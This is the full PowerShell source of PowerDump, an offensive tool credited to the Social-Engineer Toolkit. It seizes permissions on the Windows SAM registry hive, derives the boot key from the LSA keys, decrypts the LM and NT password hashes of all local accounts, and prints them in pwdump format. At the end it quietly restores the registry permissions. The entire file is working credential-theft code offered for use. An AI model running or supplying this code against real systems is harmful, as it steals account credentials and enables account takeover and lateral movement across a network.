powerdump.ps1

1. # PowerDump by David Kennedy Copyright 2014 The Social-Engineer Toolkit
2. # https://github.com/trustedsec/social-engineer-toolkit
3. # User Token Code by Nikhil Mitt ttps://github.com/samratashok/nishang
4. function LoadApi
5. {
6. $oldErrorAction = $global:ErrorActionPreference;
7. $global:ErrorActionPreference = "SilentlyContinue";
8. $test = [PowerDump.Native];
9. $global:ErrorActionPreference = $oldErrorAction;
10. if ($test)
11. {
12. # already loaded
13. return;
14. }
15.  
16. $code = @'
17. using System;
18. using System.Security.Cryptography;
19. using System.Runtime.InteropServices;
20. using System.Text;
21.  
22. namespace PowerDump
23. {
24. public class Native
25. {
26. [DllImport("advapi32.dll", CharSet = CharSet.Auto)]
27. public static extern int RegOpenKeyEx(
28. int hKey,
29. string subKey,
30. int ulOptions,
31. int samDesired,
32. out int hkResult);
33.  
34. [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
35. extern public static int RegEnumKeyEx(
36. int hkey,
37. int index,
38. StringBuilder lpName,
39. ref int lpcbName,
40. int reserved,
41. StringBuilder lpClass,
42. ref int lpcbClass,
43. out long lpftLastWriteTime);
44.  
45. [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
46. extern public static int RegQueryInfoKey(
47. int hkey,
48. StringBuilder lpClass,
49. ref int lpcbClass,
50. int lpReserved,
51. out int lpcSubKeys,
52. out int lpcbMaxSubKeyLen,
53. out int lpcbMaxClassLen,
54. out int lpcValues,
55. out int lpcbMaxValueNameLen,
56. out int lpcbMaxValueLen,
57. out int lpcbSecurityDescriptor,
58. IntPtr lpftLastWriteTime);
59.  
60. [DllImport("advapi32.dll", SetLastError=true)]
61. public static extern int RegCloseKey(
62. int hKey);
63.  
64. }
65. } // end namespace PowerDump
66.  
67. public class Shift {
68. public static int Right(int x, int count) { return x >> count; }
69. public static uint Right(uint x, int count) { return x >> count; }
70. public static long Right(long x, int count) { return x >> count; }
71. public static ulong Right(ulong x, int count) { return x >> count; }
72. public static int Left(int x, int count) { return x << count; }
73. public static uint Left(uint x, int count) { return x << count; }
74. public static long Left(long x, int count) { return x << count; }
75. public static ulong Left(ulong x, int count) { return x << count; }
76. }
77. '@
78.  
79. $provider = New-Object Microsoft.CSharp.CSharpCodeProvider
80. $dllName = [PsObject].Assembly.Location
81. $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
82. $assemblies = @("System.dll", $dllName)
83. $compilerParameters.ReferencedAssemblies.AddRange($assemblies)
84. $compilerParameters.GenerateInMemory = $true
85. $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
86. if($compilerResults.Errors.Count -gt 0) {
87. $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
88. }
89.  
90. }
91.  
92. $antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
93. $almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
94. $empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
95. $empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
96. $odd_parity = @(
97. 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
98. 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
99. 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
100. 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
101. 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
102. 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
103. 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
104. 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
105. 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
106. 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
107. 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
108. 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
109. 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
110. 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
111. 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
112. 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
113. );
114.  
115. function sid_to_key($sid)
116. {
117. $s1 = @();
118. $s1 += [char]($sid -band 0xFF);
119. $s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
120. $s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
121. $s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
122. $s1 += $s1[0];
123. $s1 += $s1[1];
124. $s1 += $s1[2];
125. $s2 = @();
126. $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
127. $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
128. return ,((str_to_key $s1),(str_to_key $s2));
129. }
130.  
131. function str_to_key($s)
132. {
133. $key = @();
134. $key += [Shift]::Right([int]($s[0]), 1 );
135. $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
136. $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
137. $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
138. $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
139. $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
140. $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
141. $key += $([int]($s[6]) -band 0x7F);
142. 0..7 | %{
143. $key[$_] = [Shift]::Left($key[$_], 1);
144. $key[$_] = $odd_parity[$key[$_]];
145. }
146. return ,$key;
147. }
148.  
149. function NewRC4([byte[]]$key)
150. {
151. return new-object Object |
152. Add-Member NoteProperty key $key -PassThru |
153. Add-Member NoteProperty S $null -PassThru |
154. Add-Member ScriptMethod init {
155. if (-not $this.S)
156. {
157. [byte[]]$this.S = 0..255;
158. 0..255 | % -begin{[long]$j=0;}{
159. $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
160. $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
161. }
162. }
163. } -PassThru |
164. Add-Member ScriptMethod "encrypt" {
165. $data = $args[0];
166. $this.init();
167. $outbuf = new-object byte[] $($data.Length);
168. $S2 = $this.S[0..$this.S.Length];
169. 0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
170. $i = ($i+1) % $S2.Length;
171. $j = ($j + $S2[$i]) % $S2.Length;
172. $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
173. $a = $data[$_];
174. $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
175. $outbuf[$_] = ($a -bxor $b);
176. }
177. return ,$outbuf;
178. } -PassThru
179. }
180.  
181. function des_encrypt([byte[]]$data, [byte[]]$key)
182. {
183. return ,(des_transform $data $key $true)
184. }
185.  
186. function des_decrypt([byte[]]$data, [byte[]]$key)
187. {
188. return ,(des_transform $data $key $false)
189. }
190.  
191. function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
192. {
193. $des = new-object Security.Cryptography.DESCryptoServiceProvider;
194. $des.Mode = [Security.Cryptography.CipherMode]::ECB;
195. $des.Padding = [Security.Cryptography.PaddingMode]::None;
196. $des.Key = $key;
197. $des.IV = $key;
198. $transform = $null;
199. if ($doEncrypt) {$transform = $des.CreateEncryptor();}
200. else{$transform = $des.CreateDecryptor();}
201. $result = $transform.TransformFinalBlock($data, 0, $data.Length);
202. return ,$result;
203. }
204.  
205. function Get-RegKeyClass([string]$key, [string]$subkey)
206. {
207. switch ($Key) {
208. "HKCR" { $nKey = 0x80000000} #HK Classes Root
209. "HKCU" { $nKey = 0x80000001} #HK Current User
210. "HKLM" { $nKey = 0x80000002} #HK Local Machine
211. "HKU" { $nKey = 0x80000003} #HK Users
212. "HKCC" { $nKey = 0x80000005} #HK Current Config
213. default {
214. throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
215. }
216. }
217. $KEYQUERYVALUE = 0x1;
218. $KEYREAD = 0x19;
219. $KEYALLACCESS = 0x3F;
220. $result = "";
221. [int]$hkey=0
222. if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
223. {
224. $classVal = New-Object Text.Stringbuilder 1024
225. [int]$len = 1024
226. if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
227. [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
228. {
229. $result = $classVal.ToString()
230. }
231. else
232. {
233. Write-Error "RegQueryInfoKey failed";
234. }
235. [PowerDump.Native]::RegCloseKey($hkey) | Out-Null
236. }
237. else
238. {
239. Write-Error "Cannot open key";
240. }
241. return $result;
242. }
243.  
244. function Get-BootKey
245. {
246. $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
247. $b = new-object byte[] $($s.Length/2);
248. 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
249. $b2 = new-object byte[] 16;
250. 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
251. return ,$b2;
252. }
253.  
254. function Get-HBootKey
255. {
256. param([byte[]]$bootkey);
257. $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
258. $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
259. $k = Get-Item HKLM:\SAM\SAM\Domains\Account;
260. if (-not $k) {return $null}
261. [byte[]]$F = $k.GetValue("F");
262. if (-not $F) {return $null}
263. $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
264. $rc4 = NewRC4 $rc4key;
265. return ,($rc4.encrypt($F[0x80..0x9F]));
266. }
267.  
268. function Get-UserName([byte[]]$V)
269. {
270. if (-not $V) {return $null};
271. $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
272. $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
273. return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
274. }
275.  
276. function Get-UserHashes($u, [byte[]]$hbootkey)
277. {
278. [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
279. # check if hashes exist (if byte memory equals to 20, then we've got a hash)
280. $LM_exists = $false;
281. $NT_exists = $false;
282. # LM header check
283. if ($u.V[0xa0..0xa3] -eq 20)
284. {
285. $LM_exists = $true;
286. }
287. # NT header check
288. elseif ($u.V[0xac..0xaf] -eq 20)
289. {
290. $NT_exists = $true;
291. }
292. if ($LM_exists -eq $true)
293. {
294. $lm_hash_offset = $u.HashOffset + 4;
295. $nt_hash_offset = $u.HashOffset + 8 + 0x10;
296. $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
297. $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
298. }
299. elseif ($NT_exists -eq $true)
300. {
301. $nt_hash_offset = $u.HashOffset + 8;
302. $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
303. }
304. return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
305. }
306.  
307. function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
308. {
309. [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
310. # LM Hash
311. if ($enc_lm_hash)
312. {
313. $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
314. }
315.  
316. # NT Hash
317. if ($enc_nt_hash)
318. {
319. $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
320. }
321.  
322. return ,($lmhash,$nthash)
323. }
324.  
325. function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
326. {
327. $deskeys = sid_to_key $rid;
328. $md5 = [Security.Cryptography.MD5]::Create();
329. $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
330. $rc4 = NewRC4 $rc4_key;
331. $obfkey = $rc4.encrypt($enc_hash);
332. $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
333. (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
334. return ,$hash;
335. }
336.  
337. function Get-UserKeys
338. {
339. ls HKLM:\SAM\SAM\Domains\Account\Users |
340. where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
341. Add-Member AliasProperty KeyName PSChildName -PassThru |
342. Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
343. Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
344. Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
345. Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
346. }
347.  
348. function DumpHashes
349. {
350. LoadApi
351. $bootkey = Get-BootKey;
352. $hbootKey = Get-HBootKey $bootkey;
353. Get-UserKeys | %{
354. $hashes = Get-UserHashes $_ $hBootKey;
355. "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
356. [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
357. [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
358. }
359. }
360.  
361. #Set permissions for the current user.
362. $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
363. [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
364. "FullControl",
365. [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
366. [System.Security.AccessControl.PropagationFlags]"None",
367. [System.Security.AccessControl.AccessControlType]"Allow")
368. $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
369. "SAM\SAM\Domains",
370. [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
371. [System.Security.AccessControl.RegistryRights]::ChangePermissions)
372. $acl = $key.GetAccessControl()
373. $acl.SetAccessRule($rule)
374. $key.SetAccessControl($acl)
375.  
376. DumpHashes
377.  
378. #Remove the permissions added above.
379. $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
380. $acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
381. Set-Acl HKLM:\SAM\SAM\Domains $acl